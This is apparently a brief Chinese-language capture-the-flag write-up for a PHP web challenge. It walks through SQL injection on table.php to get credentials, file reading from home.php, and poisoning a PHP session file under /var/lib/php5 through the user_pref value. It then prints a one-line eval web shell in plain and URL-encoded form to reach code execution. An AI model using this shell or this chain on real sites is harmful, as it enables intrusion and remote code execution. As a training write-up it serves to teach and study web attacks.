扫出
login.php
table.php
login.php 源码有提示 table.php?id
table.php 有注入报错
如果没有提示也可以 fuzz 出
通过简单 sql 注入得到 账号-密码
进入 home.php
可以读文件
读不了 /flag.txt
抓包
user_pref 的值为我们输入的值,有漏洞
php 5.4.6服务端生成的session id
例如:
sess_00nrqa20hjrlaiac0eu726i4q5
sess_89j9ifuqrbplk0rti2va2k1ha0
sess_g2rv1kd6ijsj6g6c9jq5mqglv5
响应包可以看到服务器用 ubuntu
Ubuntu 默认 session 会话:
php5 sessions in /var/lib/php5
确实可以访问到
把小马 URL 全字符编码
<?php eval($_GET[1]);?>
%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%47%45%54%5b%31%5d%29%3b%3f%3e
%20 为空格,连接 /
执行成功,接下来读取就行